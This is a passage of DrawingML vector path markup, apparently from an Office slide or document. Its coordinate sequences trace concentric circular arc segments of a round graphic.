                  <a:pt x="406679" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431571" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457974" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485863" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515175" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545884" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577951" y="621855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611327" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645985" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681888" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718972" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757224" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796582" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837018" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878497" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920965" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964399" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008735" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053960" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100023" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1146873" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="226898"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2207069" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="2889885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="2888234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="2884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="2879979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="2873375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="2865120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="2855214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="2843644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="2830436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="2815577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="2799067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="2780893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="2761081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="2739618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="2716492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="2691727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="2665298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="2701874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="2942856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="2941282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="2938132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="2933408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="2927108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="2919234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="2909786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="2898762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="2886151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="2871978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="2856230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="2838907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="2820009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="2799537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="2777477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="2753855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2201634" y="2728658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="2701874"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2243010" y="242011"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2201634" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159571" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2116836" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2073503" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2029587" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1985149" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1940229" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1894852" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1849081" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1802955" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756498" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1709775" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662823" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1615668" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568373" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1520977" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473504" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426019" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378546" y="1574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331150" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283855" y="9486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1236700" y="15811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189748" y="23723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143025" y="33210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096568" y="44284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050442" y="56946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004671" y="71183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="959294" y="86995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914374" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869937" y="123380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826020" y="143941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782688" y="166090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739952" y="189814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697890" y="215125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656526" y="242011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692467" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734682" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777595" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821156" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865314" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="910018" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="955243" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000937" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1047051" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1093533" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140358" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1187475" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234821" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282382" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330096" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377911" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425803" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473720" y="53187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1521612" y="54838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569427" y="58166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617141" y="63131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1664703" y="69773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1712048" y="78054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1759165" y="88011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1805990" y="99618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852472" y="112890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898586" y="127812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944281" y="144399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989505" y="162636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034209" y="182537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2078367" y="204089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121928" y="227317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164842" y="252183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2207069" y="278714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243010" y="242011"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619756" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606560" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591562" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574810" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556345" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536202" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514422" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491054" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466111" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439670" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411742" y="2214054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382380" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351621" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319502" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286063" y="2357285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2251354" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215413" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178266" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2139950" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100529" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060028" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2018487" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975954" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932457" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888032" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842744" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796605" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749679" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="2673299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749031" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1795373" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1840966" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885784" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1929790" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972945" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2015223" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056574" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096973" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136394" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2174786" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212124" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2248370" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2283485" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317432" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350198" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381720" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411984" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440940" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468562" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494826" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519667" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543073" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565006" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585428" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604300" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621597" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637282" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651315" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2663672" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2663672" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651315" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637282" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621597" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604300" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585428" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565006" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543073" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519667" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494826" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468562" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440940" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411984" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381720" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350198" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317432" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2283485" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2248370" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212124" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2174786" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136394" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096973" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056574" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2015223" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972945" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1929790" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885784" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1840966" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1795373" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749031" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="226898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749679" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796605" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842744" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888032" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932457" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975954" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2018487" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060028" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100529" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2139950" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178266" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215413" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2251354" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286063" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319502" y="621855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351621" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382380" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411742" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439670" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466111" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491054" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514422" y="894029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536202" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556345" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574810" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591562" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606560" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619756" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="2896476" y="1447927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2894927" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891815" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887141" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2880931" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873146" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863824" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852940" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2840494" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826499" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2810954" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2793847" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775178" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2754960" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733192" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709862" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684983" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658554" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2622486" y="703783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647810" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2671610" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2693873" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714587" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733776" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2751442" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767558" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782138" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795193" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806700" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816682" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825127" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832036" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837408" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841244" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2843555" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844317" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2843555" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841244" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837408" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832036" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825127" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816682" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806700" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795193" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782138" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767558" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2751442" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733776" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714587" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2693873" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2671610" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647810" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2622486" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658554" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684983" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709862" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733192" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2754960" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775178" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2793847" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2810954" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826499" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2840494" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852940" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863824" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873146" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2880931" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
